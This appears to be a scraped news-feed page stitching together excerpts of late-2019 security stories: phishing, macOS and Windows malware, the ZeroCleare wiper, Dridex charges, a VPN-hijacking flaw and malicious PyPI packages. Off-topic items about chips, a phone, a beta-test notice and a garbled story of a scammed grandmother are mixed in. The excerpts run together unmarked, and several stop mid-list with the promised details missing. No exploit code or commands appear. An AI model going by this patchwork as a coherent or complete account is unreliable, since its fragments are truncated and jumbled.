He manipulated Laolao and stole her life savings.
Why does she remember him so fondly?
Is a great inside in the lives of the elderly, who get a bit lost in this digital age:
SourceGood news for everyone!
A new version of the beta build is available for download and testing.
You can download the version from the links below
Mirror - 1
Mirror - 2
Can be activated only through Internet. Beta-license is valid for 90 days.
Before installation of the new build, please uninstall the previous build (sometimes kavremover may be needed) and reboot the system
Please pay attention
In this build you can meet problems caused by Anti-Banner: some web sites may not be loaded, some may lose random function, or page could be shown incorrectly. We ask you to switch on Anti-Banner before testing to reveal this problems.
Advices for novice testers
- Do not proceed with testing without reading the instructions;
- All found bugs should be posted in the related topics so it would be wise to read their headers at first. Bug reports should contain all useful info (it will be clear after reading the instruction from p.1);
- The most convenient way to upload big files (traces or dumps): in .zip archive on OwnCloud.;
- Traces as well as app and driver verifiers are enable in this build.
- This area of forum is not connected to Tech Support (Bugs of Beta-products are collected here)
Please don't post on the beta forum if you are not participating in the beta testing.
A clever phishing campaign has been spotted that bundles the scam's landing page in the HTML attachment rather than redirecting users to another site that asks them to log in.
A typical credential-stealing phishing scam consists of an email where the attacker tries to convince the user to click a link in order to retrieve a document or prevent something from happening. These links will then bring the user to a web site, or landing page, that includes a login form where the user must enter their login credentials to proceed.
With this type of attack, users can either detect the scam by the contents of the email, by a suspicious remote site and landing page, or by alerts from security solutions.
Let's show login form locally instead
To prevent users from becoming suspicious when they are redirected to a site with a strange domain or URL, a clever scammer decided to generate the phishing scam directly in the user's browser without going to a remote site.
Researchers uncovers “ultimate man-in-the-middle attack” that used an elaborate spoofing campaign to fool a Chinese VC firm and rip off an emerging business.
Hackers pulled off an elaborate man-in-the-middle campaign to rip off an Israeli startup by intercepting a wire transfer from a Chinese venture-capital firm intended for the new business.
Are you unsure of the difference between free anti-virus for Windows and paid anti-virus software?
This article explains how free and paid anti-virus options differ, helping you to decide which is best for you.
Read on as we discuss:
Microsoft ran a password-reuse analysis on over three billion company accounts in 2019 to find out how many of the used password were in use by Microsoft customers.
The company collected password hash information from public sources and received additional data from law enforcement agencies, and used the data as a base for the comparison.
An analysis of password use in 2016 revealed that about 20% of Internet users were reusing passwords, and that an additional 27% were using passwords that were "nearly identical" to other account passwords. In 2018, it was revealed that a large part of Internet users were still favoring weak passwords over secure ones.
In-memory infection makes it harder for end-point protection to detect it.
Hackers believed to be working for the North Korean government have upped their game with a recently discovered Mac trojan that uses in-memory execution to remain stealthy.
In-memory execution, also known as fileless infection, never writes anything to a computer hard drive. Instead, it loads malicious code directly into memory and executes it from there. The technique is an effective way to evade antivirus protection because there’s no file to be analyzed or flagged as suspicious.
In-memory infections were once the sole province of state-sponsored attackers. By 2017, more advanced financially motivated hackers had adopted the technique. It has become increasing common since then.
The malware isn’t entirely fileless. The first stage poses as a cryptocurrency app with the file name UnionCryptoTrader.dmg. When it first came to light earlier this week, only two out of 57 antivirus products detected it as suspicious. On Friday, according to VirusTotal, detection had only modestly improved, with 17 of 57 products flagging it.
Once executed, the file uses a post-installation binary that, according to a detailed analysis by Patrick Wardle, a Mac security expert at enterprise Mac software provider Jamf, can do the following:
A cyberthreat actor has created a web site that promotes a fake VPN program that installs the Vidar and CryptBot password-stealing trojans. These trojans will then attempt to steal saved browser credentials and other information from a victim's computer.
While investigating a different malware infection, BleepingComputer stumbled upon a website promoting a VPN program called 'Inter VPN' that claims to be the "fastest VPN". It then shows an image of the VPN client, which is actually an image of the legitimate VPN Pro software.
NVIDIA released security updates for six high severity vulnerabilities found in the Tegra Linux Driver Package (L4T) for Jetson AGX Xavier, TK1, TX1, TX2, and Nano chips used in Mercedes-Benz's MBUX infotainment system and Bosch self-driving computer systems.
The chips affected by these flaws are also used in HP and Acer Chromebooks [1, 2], Android tablets, Nintendo Switch video game consoles, and Magic Leap One virtual retinal displays.
These security flaws that could allow local attackers with various levels of user privileges to execute arbitrary code, escalate privileges, trigger denial-of-service (DoS) states, and launch information disclosure attacks against devices featuring unpatched chips.
The high severity vulnerabilities
Potential attackers could run code on devices with vulnerable chips by taking advantage of unpatched code execution flaws, while exploiting the vulnerabilities that lead to a DoS state can render them temporarily unusable.
The German automotive giant BMW discovered and monitored a group of hackers who infiltrated the company's networks and stayed active since at least the spring of 2019.
BMW's security team spotted the hackers after discovering an instance of the legitimate penetration testing tool Cobalt Strike on a company computer, a tool regularly used in red team testing scenarios to simulate adversaries.
Hackers monitored for months
Following the discovery, the hackers were allowed to stay active with the probable end purpose of collecting more info on who they were, how many systems they managed to compromise, and what data they were after, if any, as Munich-based Bayerischer Rundfunk's reports.
The Lazarus hacking group has been caught trying to sneak a new ‘fileless’ Trojan on to Apple macOS computers disguised as a fake cryptocurrency trading application.
The discovery was reported by K7 Computing’s Dinesh Devadoss to Mac security expert Patrick Wardle, who immediately spotted similarities to previous attacks. The first of these, from 2018, was the ‘Apple.Jeus’ malware, which also used a cryptocurrency trading application to lure high-value targets in order to steal cryptocoins. In October 2019, the hackers retuned with a new backdoor Trojan that spreads using the same approach – a cryptocurrency application posted to GitHub for victims to download. To make the applications appear trustworthy, both campaigns used the ruse of setting up fake software companies using legitimate certificates.
The new Trojan, tagged by Wardle as OSX.AppleJeus.C, continues in the same vein, with one interesting twist – the so-called fileless in-memory execution of a remote payload. As its name suggests, fileless malware avoids writing files to disk to avoid detection by signature scanners, restricting itself to main memory. Once there, the malware attempts to hijack legitimate processes on the target, for example Windows PowerShell or command line scripting tools such as wscript.exe. In the case of the latest Apple campaign, the trading application is the Trojan that initiates infection, borrowing Apple API calls to create an innocent-looking object file image which is written to disk to create persistence (i.e. the ability to survive reboots).
The popular BitTorrent client uTorrent is currently being flagged as a threat by several anti-virus tools. The issue affects the desktop client as well as the Web version and the BitTorrent Mainline client. According to the anti-virus vendors, the flags were likely triggered by bundled advertisements or other unwanted software.
After the TRON acquisition, uTorrent and BitTorrent’s social media channels have been predominantly ‘crypto’ oriented. The core audience of the file-sharing clients, which still consists of millions of users, remains mostly interested in downloading and sharing files though. This is something uTorrent still does well and the same is true for the BitTorrent Mainline client. However, new users of these clients have repeatedly been warned not to use the software by several leading anti-virus vendors. In the past BitTorrent Inc. classified such warnings as false positives which it could resolve relatively easily. While that may be true, it appears that the problem is rather persistent and likely more structural than some would think.
After alarmed users reported the issue in uTorrent’s forums this week, we decided to scan the latest release for potential threats. According to VirusTotal, nine separate anti-virus vendors currently flag the software as problematic. This includes the popular Windows Defender, which labels the torrent client as a severe threat. While that sounds scary, the detailed description shows that it may include “Potentially Unwanted Software,” a term commonly used for adware. This is not the first time uTorrent has had this problem. Microsoft has flagged the torrent client in the past as well, as the dedicated Utorrent threat page shows as well. This flag was later removed, presumably after the software was updated, but now they are back in full force. Other anti-virus tools that warn users against uTorrent include Comodo, drWeb, Eset and Sophos, as the list below shows.
Any uTorrent users who receive the warning should proceed at their own risk. When we installed the most recent uTorrent we didn’t spot anything nefarious being installed but, in the past, we have noticed that the client was bundled with adware.
CyrusOne, a large data center provider in the U.S., announced on Thursday that some of its systems were affected by a ransomware attack.
Several customers impacted by the incident have availability problems. The company's managed service division is currently working to restore activity to normal.
The official note published by CyrusOne is a forward-looking statement that does not share too much information.
The company informs that six of its customers are affected because of file-encrypted malware. These customers are mainly serviced by the company's New York Data Center.
Managed services are not the main business of the provider as CyrusOne also offers colocation facilities in about 48 data centers across the globe.
Systems affected by this ransomware attack are limited to this division and do not include IX (internet exchange) and IP Network Services.
... ... ...
In a lawsuit filed today, Facebook alleges that a Chinese company used malware to compromise user accounts to run deceptive ads on the social media platform.
The end goal of compromising Facebook accounts was distribution of deceptive ads for counterfeit goods and diet pills.
The company in question is ILikeAd Media International Company Ltd, represented by Chen Xiao Cong and Huang Tao, who Facebook says that are the authors of the malware behind the entire promo scheme. In a blog post today, Facebook says that the defendants employed two tactics to disguise the true goal of their campaign.
One method was to use images of celebrities in their ads, also known as 'celeb bait,' to trick users into clicking on them.
Security researchers found a new vulnerability allowing potential attackers to hijack VPN connections on affected *NIX devices and inject arbitrary data payloads into IPv4 and IPv6 TCP streams.
They disclosed the security flaw tracked as CVE-2019-14899 to distros and the Linux kernel security team, as well as to others impacted such as Systemd, Google, Apple, OpenVPN, and WireGuard.
The vulnerability is known to impact most Linux distributions and Unix-like operating systems including FreeBSD, OpenBSD, macOS, iOS, and Android.
A currently incomplete list of vulnerable operating systems and the init systems they came with is available below, with more to be added once they are tested and found to be affected:
If this report from China Times is to be believed (and this is usually a reliable source) then TSMC's 5nm testing is going very well and the first 3 customers have already been locked in - including AMD. According to the schedule obtained by China Times, AMD's 5nm products will be landing in early 2021 with mass production for 5nm scheduled in 2020.
AMD among first three customers to grab TSMC 5nm production capacity, NVIDIA missing from the picture
What is really amazing to hear in the report is that TSMC's 5nm yield has already crossed 7nm - which is quite the feat. This would mean that TSMC's 5nm will become viable sooner than expected and the transition from 7nm to 5nm can begin in earnest as well. The three customers that will be able to grab the first wave of production capacity are Apple, HiSilicon and AMD. While it is not surprising to see Apple get the first bite, it is interesting to see NVIDIA missing from this list - as I would have assumed they would be first in line to grab onto a process advantage (although this might be a questionable assumption considering they have yet to launch 7nm GPUs).
Motorola has what might be the best-looking mid-range smartphone with the "Motorola One Hyper," a $400 phone with flagship touches like an all-screen front design and a motorized, pop-up camera. It's like a mini OnePlus 7 Pro! You won't find any notches or other screen blemishes here. For specs, you have a 6.5-inch 2340×1080 IPS LCD, a 2GHz Snapdragon 675, 4GB of memory, 128GB of storage, and a 4000mAh battery. The are two rear cameras: a 64MP main sensor and a 8MP wide angle lens, and a 32MP front camera. Both the main front and back cameras have a pretty high megapixel count, and both have an optional "quad pixel" mode, which merges every four pixels together for better light pickup.
If we want to create super-human intelligence, we need to think unlike humans. Too much emphasis goes into trying to build AI that functions the same way as humans do, instead of exploring directions that can unlock the unique potential of true machine intelligence. Mikko Hyppönen, Chief Research Officer at F-Secure, takes the audience on a deep dive into new types of collaborative intelligent agents that far surpass the limits of what AI can currently do.
Payment card skimmers have hit four online merchants with help from Heroku, a cloud provider owned by Salesforce, a researcher has found.
Heroku is a cloud platform designed to make things easier for users to build, maintain, and deliver online services. It turns out that the service also makes things easier for crooks to run skimmers that target third-party sites. On Wednesday, Jérôme Segura, director of threat intelligence at security provider Malwarebytes, said he found a rash of skimmers hosted on Heroku. The hackers behind the scheme not only used the service to host their skimmer infrastructure and deliver it to targeted sites. They also used Heroku to store stolen credit-card data. Heroku administrators suspended the accounts and removed the skimmers within an hour of being notified, Segura told Ars. This is not the first time cloud services have been abused by payment card skimmers. In April, Malwarebytes documented similar abuse on Github. Two months later, the security provider reported skimmers hosted on Amazon S3 buckets. Abusing a cloud provider makes good sense from a crook's point of view. It's often free, saves the hassle of registering look-alike domain names, and delivers top-notch availability and bandwidth.
We will likely continue to observe web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it. From a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users.
The United States Department of Justice today disclosed the identities of two Russian hackers and charged them for developing and distributing the Dridex banking Trojan using which the duo stole more than $100 million over a period of 10 years.
Maksim Yakubets, the leader of 'Evil Corp' hacking group, and his co-conspirator Igor Turashev primarily distributed Dridex — also known as 'Bugat' and 'Cridex' — through multi-million email campaigns and targeted numerous organizations around the world.
The State Department has also announced a reward of up to $5 million—the largest offered bounty to date for a cybercrime suspect—for providing information that could lead to the arrest of Yakubets, who remains at large.
Besides developing and distributing Dridex, Yakubets has also been charged with conspiracy to commit bank fraud in connection with the infamous "Zeus" banking malware that stole $70 million from victims' bank accounts."Bugat malware was specifically crafted to defeat antivirus and other protective measures employed by victims. Later versions of the malware were designed with the added function of assisting in the installation of ransomware."
Starting May 2009, Yakubets and his co-conspirators allegedly employed widespread computer intrusions, malicious software, and fraud in an effort to steal millions of dollars from numerous bank accounts in the United States and elsewhere.
complete reading from here: FBI Puts $5 Million Bounty On Russian Hackers Behind Dridex Banking Malware
IBM X-Force, the company's security unit, has published a report of a new form of "wiper" malware connected to threat groups in Iran and used in a destructive attack against companies in the Middle East.
The sample was discovered in a response to an attack on what an IBM spokesperson described as "a new environment in the [Middle East]—not in Saudi Arabia, but another regional rival of Iran." Dubbed ZeroCleare, the malware is "a likely collaboration between Iranian state-sponsored groups," according to a report by IBM X-Force researchers. The attacks were targeted against specific organizations and used brute-force password attacks to gain access to network resources. The initial phase of the attacks was launched from Amsterdam IP addresses owned by a group tied to what IBM refers to as the "ITG13 Group"—also known as "Oilrig" and APT34. Another Iranian threat group may have used the same addresses to access accounts prior to the wiper campaign. "While X-Force IRIS cannot attribute the activity observed during the destructive phase of the ZeroCleare campaign," the researchers noted, "we assess that high-level similarities with other Iranian threat actors, including the reliance on ASPX web shells and compromised VPN accounts, the link to ITG13 activity, and the attack aligning with Iranian objectives in the region, make it likely this attack was executed by one or more Iranian threat groups."
In addition to brute force attacks on network accounts, the attackers exploited a SharePoint vulnerability to drop web shells on a SharePoint server. These included China Chopper, Tunna, and another Active Server Pages-based webshell named "extensions.aspx," which "shared similarities with the ITG13 tool known as TWOFACE/SEASHARPEE," the IBM researchers reported. They also attempted to install TeamViewer remote access software and used a modified version of the Mimikatz credential-stealing tool—obfuscated to hide its intent—to steal more network credentials off the compromised servers. From there, they moved out across the network to spread the ZeroCleare malware.
Two malicious versions of two Python packages were introduced in the Python Package Index (PyPI) with the purpose of stealing SSH and GPG keys from Python developers' projects.
One of them, using typosquatting to impersonate a legitimate library, resisted for about a year in the repository. The other survived for just a couple of days.
PyPI is a collection of software created and shared by the Python community to help developers in their projects.
Undetected for a year
The fake library that spent the least amount of time in PyPI available under the name 'python3-dateutil,' a clear impersonation of the 'dateutil' package with extensions to the standard Python datetime module.